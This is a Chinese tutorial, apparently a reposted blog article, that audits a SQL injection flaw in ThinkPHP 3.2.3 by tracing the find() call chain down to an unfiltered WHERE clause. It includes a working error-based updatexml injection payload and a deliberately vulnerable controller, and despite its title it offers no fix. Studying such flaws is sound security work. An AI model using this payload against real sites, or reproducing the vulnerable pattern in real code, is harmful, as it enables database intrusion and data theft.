thinkPHP3.2.3中sql注入漏洞问题怎么解决

这篇文章主要介绍“thinkPHP3.2.3中sql注入漏洞问题怎么解决”的相关知识，小编通过实际案例向大家展示操作过程，操作方法简单快捷，实用性强，希望这篇“thinkphp3.2.3中sql注入漏洞问题怎么解决”文章能帮助大家解决问题。

前言

攻敌所必救：

• ThinkPHP中的常用方法汇总总结:M方法，D方法，U方法，I方法

• Thinkphp3.2.3 安全开发须知

搭建：

1. 首先第一步就是必须先放在www目录下(我是windows用的phpstudy)！！！！

2. 创建数据库，表名一定与你接下来要M的名字的相对应

3. 连接数据库的文件不多说了，自己配置：ThinkPHP/Conf/convention.php

4. 配置控制器：\WWW\thinkphp3.2.3\Application\Home\Controller\IndexController.class.php

   <?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller {    public function index(){        $this->show('原来内容已经省略，太占地方');$data = M('user')->find(I('GET.id'));var_dump($data);}}

5. 测试：

   

正文

payload：

?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23

确实报错注入成功，一切都是因为这句代码的存在：$data = M('user')->find(I('GET.id'));

I和M方法都没有什么问题，真正的问题在于

1. find 方法上，来自/ThinkPHP/Mode/Lite/Model.class.php

 public function find($options=array()) {           // 根据复合主键查找记录        $pk  =  $this->getPk();        if (is_array($options) && (count($options) > 0) && is_array($pk)) {//但是会进入这里            // 根据复合主键查询            $count = 0;            foreach (array_keys($options) as $key) {                if (is_int($key)) $count++;             }             if ($count == count($pk)) {                $i = 0;                foreach ($pk as $field) {                    $where[$field] = $options[$i];                    unset($options[$i++]);                }                $options['where']  =  $where;            } else {                return false;            }        }        // 总是查找一条记录        $options['limit']   =   1;        // 分析表达式        $options            =   $this->_parseOptions($options);//前面都没有什么影响，重点是这里的函数调用     $resultSet          =   $this->db->select($options);//重要的一步

_parseOptions：因为主要针对options[where]所以无关代码我全删除了

/ThinkPHP/Library/Think/Model.class.php

protected function _parseOptions($options=array()) {        if(is_array($options))            $options =  array_merge($this->options,$options);        // 字段类型验证        if(isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join'])) {//这里不满足is_array($options['where'])            // 对数组查询条件进行字段类型检查            foreach ($options['where'] as $key=>$val){                $key            =   trim($key);                if(in_array($key,$fields,true)){                    if(is_Scalar($val)) {                        $this->_parseType($options['where'],$key);                    }                }elseif(!is_numeric($key) && '_' != substr($key,0,1) && false === strpos($key,'.') && false === strpos($key,'(') && false === strpos($key,'|') && false === strpos($key,'&')){                    if(!empty($this->options['strict'])){                        E(L('_ERROR_QUERY_EXPRESS_').':['.$key.'=>'.$val.']');                    }                     unset($options['where'][$key]);                }            }        }    //上面均没用，到现在开始有用：?        // 查询过后清空sql表达式组装 避免影响下次查询        $this->options  =   array();        // 表达式过滤        $this->_options_filter($options);//这里值得注意        return $options;    }

_options_filter

到这就无了

而且上面的操作也会清零 $options，所以这里可能是进错了

所以更正第二部的跟踪，改为

2.select：/ThinkPHP/Library/Think/Db/Driver.class.php

public function select($options=array()) {        $this->model  =   $options['model'];        $this->parseBind(!empty($options['bind'])?$options['bind']:array());        $sql    = $this->buildSelectSql($options);        $result   = $this->query($sql,!empty($options['fetch_sql']) ? true : false);        return $result;    }

3.buildSelectSql：地址同上

public function buildSelectSql($options=array()) {        if(isset($options['page'])) {            // 根据页数计算limit            list($page,$listRows)   =   $options['page'];            $page    =  $page>0 ? $page : 1;            $listRows=  $listRows>0 ? $listRows : (is_numeric($options['limit'])?$options['limit']:20);            $offset  =  $listRows*($page-1);            $options['limit'] =  $offset.','.$listRows;        }        $sql  =   $this->parseSql($this->selectSql,$options);        return $sql;    }

4.parseSql：地址同上

public function parseSql($sql,$options=array()){        $sql   = str_replace(            array('%TABLE%','%DISTINCT%','%FIELD%','%JOIN%','%WHERE%','%GROUP%','%HAVING%','%ORDER%','%LIMIT%','%UNION%','%LOCK%','%COMMENT%','%FORCE%'),            array(                $this->parseTable($options['table']),                $this->parseDistinct(isset($options['distinct'])?$options['distinct']:false),                $this->parseField(!empty($options['field'])?$options['field']:'*'),                $this->parseJoin(!empty($options['join'])?$options['join']:''),                $this->parseWhere(!empty($options['where'])?$options['where']:''),                $this->parseGroup(!empty($options['group'])?$options['group']:''),                $this->parseHaving(!empty($options['having'])?$options['having']:''),                $this->parseOrder(!empty($options['order'])?$options['order']:''),                $this->parseLimit(!empty($options['limit'])?$options['limit']:''),                $this->parseUnion(!empty($options['union'])?$options['union']:''),                $this->parseLock(isset($options['lock'])?$options['lock']:false),                $this->parseComment(!empty($options['comment'])?$options['comment']:''),                $this->parseForce(!empty($options['force'])?$options['force']:'')            ),$sql);        return $sql;    }

5.parseWhere：同上

protected function parseWhere($where) {        $whereStr = '';        if(is_string($where)) {//直接满足，直接进入            // 直接使用字符串条件            $whereStr = $where;        }else{ // 使用数组表达式        }            return empty($whereStr)?'':' WHERE '.$whereStr;}

最后$sql=where 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23

然后

$result   = $this->query($sql,!empty($options['fetch_sql']) ? true : false);return $result;

整个过程没有任何过滤，seay分析thinkPHP太飞费劲了

PHPstORM断点审计：

payload不变：

?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23

还是跟踪find函数：

跟踪到这里步入一下，继续跟踪，跟踪到最后会跳出这个函数并且，值依然没有改变，同时步入下一个函数

经核实，步入到了另一个函数中：

继续跟踪buildSelectSql：

继续跟踪parseSql：

最后的代码变成了：

SELECT * FROM user WHERE 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)# LIMIT 1
还是debug起来方便，基本不需要怎么动脑

关于“thinkPHP3.2.3中sql注入漏洞问题怎么解决”的内容就介绍到这里了，感谢大家的阅读。如果想了解更多行业相关的知识，可以关注编程网PHP编程频道，小编每天都会为大家更新不同的知识点。